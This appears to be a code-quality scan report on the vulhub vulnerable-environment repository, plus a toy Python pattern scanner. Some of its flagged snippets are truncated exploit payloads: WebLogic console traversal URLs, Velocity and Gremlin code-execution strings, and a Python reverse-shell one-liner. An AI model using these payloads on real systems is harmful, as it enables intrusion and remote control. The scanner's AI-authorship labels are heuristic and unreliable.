Repository Analysis

vulhub/vulhub

Pre-Built Vulnerable Environments Based on Docker-Compose

Verdict: 4.4 (Likely human-written)

Adjusted Score: 4.4
Raw Score: 4.4
Time Factor: 100%
Last Push: 2026-05-12
Stars: 20,760
Language: Dockerfile
Lines of Code: 86,458
Files: 1551
Pattern Hits: 145
Scan Date: 2026-05-31

Score History

Severity Breakdown

CRITICAL 13 · HIGH 9 · MEDIUM 23 · LOW 100

Pattern Findings

145 matches across 13 categories. Each category below lists its hits with severity, file and line, and the flagged snippet where the scanner recorded one.

Hallucination Indicators: 13 hits · 160 pts

Severity  File:Line  Snippet
CRITICAL  activemq/CVE-2022-41678/poc.py:12  'out.println(org.apache.commons.io.IOUtils.toString(p.getInputStream(), "utf-8")); %>')
CRITICAL  weblogic/CVE-2020-14882/README.md:45  http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2
CRITICAL  weblogic/CVE-2020-14882/README.md:78  http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.spri
CRITICAL  weblogic/CVE-2020-14882/README.zh-cn.md:41  http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2
CRITICAL  weblogic/CVE-2020-14882/README.zh-cn.md:74  http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.spri
CRITICAL  java/rmi-registry-bind-deserialization-bypass/README.md:13  || java.lang.reflect.Proxy.class.isAssignableFrom(clazz)
CRITICAL  java/rmi-registry-bind-deserialization-bypass/README.md:17  || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz)
CRITICAL  java/rmi-registry-bind-deserialization-bypass/README.md:18  || java.rmi.server.UID.class.isAssignableFrom(clazz)) {
CRITICAL  …i-registry-bind-deserialization-bypass/README.zh-cn.md:11  || java.lang.reflect.Proxy.class.isAssignableFrom(clazz)
CRITICAL  …i-registry-bind-deserialization-bypass/README.zh-cn.md:15  || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz)
CRITICAL  …i-registry-bind-deserialization-bypass/README.zh-cn.md:16  || java.rmi.server.UID.class.isAssignableFrom(clazz)) {
CRITICAL  hugegraph/CVE-2024-27348/README.md:44  "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect
CRITICAL  hugegraph/CVE-2024-27348/README.zh-cn.md:42  "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect
Decorative Section Separators: 14 hits · 51 pts

Severity  File:Line  Snippet
MEDIUM  openclaw/CVE-2026-25253/poc.py:696  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:698  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:704  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:706  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:931  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:933  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:229  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:233  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:669  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:671  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:995  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:997  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:1018  # -------------------------------------------------------
MEDIUM  openclaw/CVE-2026-25253/poc.py:1020  # -------------------------------------------------------
Excessive Try-Catch Wrapping: 32 hits · 37 pts

Severity  File:Line  Snippet
LOW  openclaw/CVE-2026-25253/poc.py:536  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:544  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:551  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:692  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:395  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:515  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:624  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:721  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:782  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:816  except Exception:
LOW  openclaw/CVE-2026-25253/poc.py:851  except Exception:
LOW  tests/tools/update_dockerhub.py:118  except Exception as e:
MEDIUM  tests/tools/update_dockerhub.py:112  def main():
MEDIUM  tests/tools/check_image_arch.py:281  print(f"Error: {args.file} not found.", file=sys.stderr)
LOW  tests/tools/check_image_arch.py:323  except Exception as e:
LOW  erlang/CVE-2025-32433/exploit.py:145  except Exception as e:
LOW  showdoc/3.2.5-sqli/poc.py:26  except Exception as e:
MEDIUM  superset/CVE-2023-27524/CVE-2023-27524.py:36  print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
MEDIUM  superset/CVE-2023-27524/CVE-2023-27524.py:46  print('Error: No session cookie found')
MEDIUM  superset/CVE-2023-27524/CVE-2023-27524.py:55  print('Error: Not a Flask session cookie')
LOW  superset/CVE-2023-27524/CVE-2023-27524.py:98  except Exception as e_inner:
LOW  superset/CVE-2023-27524/CVE-2023-27524.py:119  except Exception as e_inner:
LOW  superset/CVE-2023-27524/CVE-2023-27524.py:124  except Exception as e:
LOW  nginx-ui/CVE-2026-27944/poc.py:83  except Exception as e:
LOW  nginx-ui/CVE-2026-27944/poc.py:210  except Exception as e:
LOW  zabbix/CVE-2016-10134/CVE-2016-10134.py:89  except Exception:
LOW  craftcms/CVE-2025-32432/poc.py:203  except Exception as e:
LOW  ingress-nginx/CVE-2025-1974/exploit.py:113  except Exception as e:
MEDIUM  ingress-nginx/CVE-2025-1974/exploit.py:114  print(f"Error on /proc/{proc}/fd/{fd}: {e}")
MEDIUM  ingress-nginx/CVE-2025-1974/exploit.py:134  print(f"Error: Shell file '{shell_file}' not found")
LOW  ingress-nginx/CVE-2025-1974/exploit.py:150  except Exception as e:
MEDIUM  ingress-nginx/CVE-2025-1974/exploit.py:151  print(f"Error connecting to {host}:{port}: {e} - host is up?")
Cross-Language Confusion: 6 hits · 30 pts

Severity  File:Line  Snippet
HIGH  wordpress/pwnscriptum/exploit.py:17  return 'target(any -froot@localhost -be %s null)' % command
HIGH  airflow/CVE-2020-11981/exploit_airflow_celery.py:8  ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3
HIGH  jira/CVE-2019-11581/poc.py:28  #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
HIGH  jira/CVE-2019-11581/poc.py:40  payload = "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('whoa
HIGH  ingress-nginx/CVE-2025-1974/exploit.py:54  "creationTimestamp": null,
HIGH  ingress-nginx/CVE-2025-1974/exploit.py:87  "oldObject": null,
Verbosity Indicators: 14 hits · 25 pts

Severity  File:Line  Snippet
LOW  openclaw/CVE-2026-25253/poc.py:932  # Step 7: Restore original cliBackends config
LOW  openclaw/CVE-2026-25253/poc.py:828  # Step 5: Set session model to the injected CLI backend
LOW  openclaw/CVE-2026-25253/poc.py:868  # Step 6: Trigger agent execution — CLI backend spawns command directly
LOW  nginx-ui/CVE-2026-27944/poc.py:180  # Step 1: Create a new admin user via X-Node-Secret
LOW  nginx-ui/CVE-2026-27944/poc.py:195  # Step 2: Get RSA public key for encrypted login
LOW  nginx-ui/CVE-2026-27944/poc.py:214  # Step 3: RSA-encrypt login credentials and authenticate
LOW  nginx-ui/CVE-2026-27944/poc.py:253  # Step 1: Download backup
LOW  nginx-ui/CVE-2026-27944/poc.py:263  # Step 2: Parse encryption key
LOW  nginx-ui/CVE-2026-27944/poc.py:266  # Step 3: Decrypt backup
LOW  nginx-ui/CVE-2026-27944/poc.py:269  # Step 4: Extract secrets
LOW  nginx-ui/CVE-2026-27944/poc.py:272  # Step 5: Exploit with Node Secret
LOW  nginx-ui/CVE-2026-27944/poc.py:279  # Step 6: Optionally create new admin user and obtain JWT token
LOW  craftcms/CVE-2025-32432/poc.py:178  # Step 2: Inject PHP payload into session
LOW  craftcms/CVE-2025-32432/poc.py:183  # Step 3: Trigger RCE
Unused Imports: 22 hits · 22 pts (the scanner records no snippet for this category)

Severity  File:Line
LOW  activemq/CVE-2023-46604/poc.py:1
LOW  activemq/CVE-2022-41678/poc.py:8
LOW  cmsms/CVE-2021-26120/poc.py:4
LOW  python/PIL-CVE-2018-16509/app.py:1
LOW  python/PIL-CVE-2017-8291/app.py:5
LOW  grafana/admin-ssrf/grafana-ssrf.py:15
LOW  airflow/CVE-2020-11981/exploit_airflow_celery.py:1
LOW  opensmtpd/CVE-2020-7247/poc.py:19
LOW  nginx-ui/CVE-2026-27944/poc.py:24
LOW  openssl/CVE-2014-0160/ssltest.py:12
LOW  django/CVE-2020-9402/vuln/views.py:1
LOW  django/CVE-2021-35042/vuln/urls.py:1
LOW  django/CVE-2021-35042/vuln/urls.py:1
LOW  django/CVE-2022-34265/vuln/models.py:1
LOW  django/CVE-2022-34265/vuln/urls.py:1
LOW  django/CVE-2022-34265/vuln/urls.py:1
LOW  django/CVE-2022-34265/vuln/views.py:1
LOW  base/pgadmin/6.16/config_local.py:1
LOW  base/pgadmin/7.6/config_local.py:1
LOW  base/django/2.0.7/app.py:3
LOW  ingress-nginx/CVE-2025-1974/exploit.py:1
LOW  spring/CVE-2025-41242/poc.py:6
Over-Commented Block: 17 hits · 16 pts

Severity  File:Line  Snippet
LOW  couchdb/CVE-2022-24706/poc.py:1  # Exploit Title: Remote Command Execution via Erlang Distribution Protocol
LOW  apisix/CVE-2020-13945/config.yml:1  #
LOW  apisix/CVE-2021-45232/apisix.yml:1  #
LOW  apisix/CVE-2021-45232/dashboard.yml:1  #
LOW  openclaw/CVE-2026-25253/poc.py:221  websockets.exceptions.ConnectionClosedError) as exc:
LOW  thinkphp/in-sqlinjection/www/database.php:1  <?php
LOW  opensmtpd/CVE-2020-7247/poc.py:1  # Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution
LOW  base/couchdb/2.1.0/docker-entrypoint.sh:1  #!/bin/bash
LOW  base/couchdb/3.2.1/docker-entrypoint.sh:1  #!/bin/bash
LOW  base/couchdb/1.6.0/docker-entrypoint.sh:1  #!/bin/bash
LOW  base/aj-report/1.4.0/bootstrap.yml:61  # To use minio file storage, enable the following configuration
LOW  base/thinkphp/2.1/index.php:1  <?php
LOW  base/solr/8.6.1/cloud/zoo.cfg:1  # The number of milliseconds of each tick
LOW  base/solr/8.6.1/cloud/zoo.cfg:21  #
LOW  base/solr/8.3.0/cloud/zoo.cfg:1  # The number of milliseconds of each tick
LOW  base/solr/8.3.0/cloud/zoo.cfg:21  #
LOW  base/superset/2.0.1/run-server.sh:1  #!/usr/bin/env bash
Cross-File Repetition: 3 hits · 15 pts

Severity  File:Line  Snippet
HIGH  python/unpickle/README.md:0  python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("172.18.0.1",80));o
HIGH  python/unpickle/README.zh-cn.md:0  python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("172.18.0.1",80));o
HIGH  python/unpickle/exp.py:0  python -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("172.18.0.1",80));o
Deep Nesting: 11 hits · 10 pts (the scanner records no snippet for this category)

Severity  File:Line
LOW  activemq/CVE-2022-41678/poc.py:972
LOW  tomcat/CVE-2020-1938/poc.py:181
LOW  openclaw/CVE-2026-25253/poc.py:457
LOW  openclaw/CVE-2026-25253/poc.py:638
LOW  tests/tools/check_image_arch.py:262
LOW  tests/check/test_env_toml.py:60
LOW  superset/CVE-2023-27524/CVE-2023-27524.py:18
LOW  nginx-ui/CVE-2026-27944/poc.py:88
LOW  imagemagick/CVE-2022-44268/poc.py:41
LOW  base/saltstack/2019.2.3/saltinit.py:8
LOW  base/saltstack/3002/saltinit.py:8
Redundant / Tautological Comments: 4 hits · 6 pts

Severity  File:Line  Snippet
LOW  openclaw/CVE-2026-25253/poc.py:805  # Check if the connection is still open before deciding.
LOW  .github/workflows/update-vulhub-org.yml:60  # Check if there are changes to commit
LOW  base/n8n/1.65.0/docker-entrypoint.sh:15  # Check if admin already exists
LOW  base/jenkins/2.46.1/install-plugins.sh:231  # Check if there's a version-specific update center, which is the case for LTS versions
Hyper-Verbose Identifiers: 5 hits · 4 pts

Severity  File:Line  Snippet
LOW  tomcat/CVE-2020-1938/poc.py:231  def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
LOW  openclaw/CVE-2026-25253/poc.py:200  async def _connect_and_authenticate(target, token_data, quiet=False):
LOW  openclaw/CVE-2026-25253/poc.py:457  async def _wait_for_gateway_restart(target, max_wait=30, token_data=None):
LOW  tests/check/test_env_toml.py:60  def test_dockerfile_covers_all_vulhub_images():
LOW  php/xdebug-rce/exp.py:43  class XDebugRequestHandler(socketserver.BaseRequestHandler):
Self-Referential Comments: 1 hit · 3 pts

Severity  File:Line  Snippet
MEDIUM  base/postgres/9.6.7/docker-entrypoint.sh:40  # Create the transaction log directory before initdb is run (below) so the directory is owned by the correct user
Fake / Example Data: 3 hits · 2 pts

Severity  File:Line  Snippet
LOW  comfyui/CVE-2025-67303/evil-git-server.py:65  subprocess.run(["git", "config", "user.email", "test@test.com"], cwd=src_path, check=True,
LOW  jira/CVE-2019-11581/poc.py:12  "from": "test@test.com",
LOW  base/n8n/1.65.0/docker-entrypoint.sh:50  "placeholder": "John Doe"
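The tables above show what a line-oriented pattern scan of a proof-of-concept repository looks like: runs of dashes, "# Step N:" narration, catch-all except clauses, and foreign-language tokens such as `null` are each counted as a hit and weighted by severity. The scanner that produced this page does not publish its rules, so the following is an added toy re-implementation of four of its categories (it is not the tool's code and not vulhub's); every regex, threshold and severity in it is an assumption chosen to mirror the tables, and the sample PoC it scans is constructed for the example. One practitioner's caveat is built in: the "Cross-Language Confusion" rule fires only on a bare Python name, because in a PoC file a `null` inside a JSON string literal (as in the ingress-nginx rows above) is payload, not a language mix-up.

```python
"""Toy pattern scanner in the style of the report above.

Added illustration only: the scanner that produced the page does not publish
its rules, so every regex and threshold here is an assumption. The category
names are reused; the severities are chosen to mirror the report's tables.
"""
import ast
import re
from collections import Counter
from dataclasses import dataclass

# Line-level rules (assumed): a long run of dashes in a comment, "# Step N:"
# narration, and a catch-all except clause.
SEPARATOR_RE = re.compile(r"^\s*#\s*-{20,}\s*$")
STEP_COMMENT_RE = re.compile(r"^\s*#\s*Step\s+\d+\s*:", re.IGNORECASE)
BARE_EXCEPT_RE = re.compile(r"^\s*except\s+Exception(?:\s+as\s+\w+)?\s*:\s*$")
# Bare names that belong to other languages; in Python they raise NameError.
FOREIGN_NAMES = {"null", "true", "false", "nil", "undefined"}


@dataclass(frozen=True)
class Hit:
    category: str
    severity: str
    path: str
    line: int
    snippet: str


def unused_imports(tree: ast.AST) -> list[tuple[int, str]]:
    """Names bound by import statements that no ast.Name in the module loads."""
    bound: dict[str, int] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:          # "import os.path" binds "os"
                bound[alias.asname or alias.name.split(".")[0]] = node.lineno
        elif isinstance(node, ast.ImportFrom):
            for alias in node.names:
                if alias.name != "*":
                    bound[alias.asname or alias.name] = node.lineno
    used = {n.id for n in ast.walk(tree) if isinstance(n, ast.Name)}
    return sorted((ln, name) for name, ln in bound.items() if name not in used)


def scan(path: str, source: str) -> list[Hit]:
    """Run the line rules, then the AST rules; hits come back ordered by line."""
    lines = source.splitlines()
    hits: list[Hit] = []
    for ln, text in enumerate(lines, start=1):
        if SEPARATOR_RE.match(text):
            hits.append(Hit("Decorative Section Separators", "MEDIUM", path, ln, text.strip()))
        elif STEP_COMMENT_RE.match(text):
            hits.append(Hit("Verbosity Indicators", "LOW", path, ln, text.strip()))
        elif BARE_EXCEPT_RE.match(text):
            hits.append(Hit("Excessive Try-Catch Wrapping", "LOW", path, ln, text.strip()))
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return hits                            # not Python: line rules only
    for ln, name in unused_imports(tree):
        hits.append(Hit("Unused Imports", "LOW", path, ln, lines[ln - 1].strip()))
    # Only a bare name counts: "null" inside a string literal is payload, not a bug.
    for node in ast.walk(tree):
        if isinstance(node, ast.Name) and node.id in FOREIGN_NAMES:
            hits.append(Hit("Cross-Language Confusion", "HIGH", path, node.lineno,
                            lines[node.lineno - 1].strip()))
    return sorted(hits, key=lambda h: h.line)


def severity_breakdown(hits: list[Hit]) -> dict[str, int]:
    """Counts per severity, the same shape as the report's Severity Breakdown."""
    return dict(Counter(h.severity for h in hits))


# Constructed sample PoC (not from vulhub) that trips four of the rules but
# keeps its JSON payload inside a string, so the null is not reported.
SAMPLE_POC = '''\
import sys
import requests
import json  # never used below

# -------------------------------------------------------
# Step 1: Send the (constructed) admission-review payload
# -------------------------------------------------------
PAYLOAD = '{"creationTimestamp": null, "oldObject": null}'

def send(url):
    try:
        return requests.post(url, data=PAYLOAD, timeout=5).text
    except Exception:
        return None

if __name__ == "__main__":
    print(send(sys.argv[1]))
'''

if __name__ == "__main__":
    found = scan("sample/poc.py", SAMPLE_POC)
    for h in found:
        print(f"{h.severity:8} {h.path}:{h.line}  {h.category}: {h.snippet}")
    print(severity_breakdown(found))
```

Run stand-alone it reports the unused `json` import, the two dashed separators, the "# Step 1:" comment and the catch-all `except`, and nothing for the two `null` tokens; a file that is not Python (a shell entrypoint, say) falls back to the line rules only, which is why shebangs and YAML comments show up in the report's tables but no AST-level findings do for them.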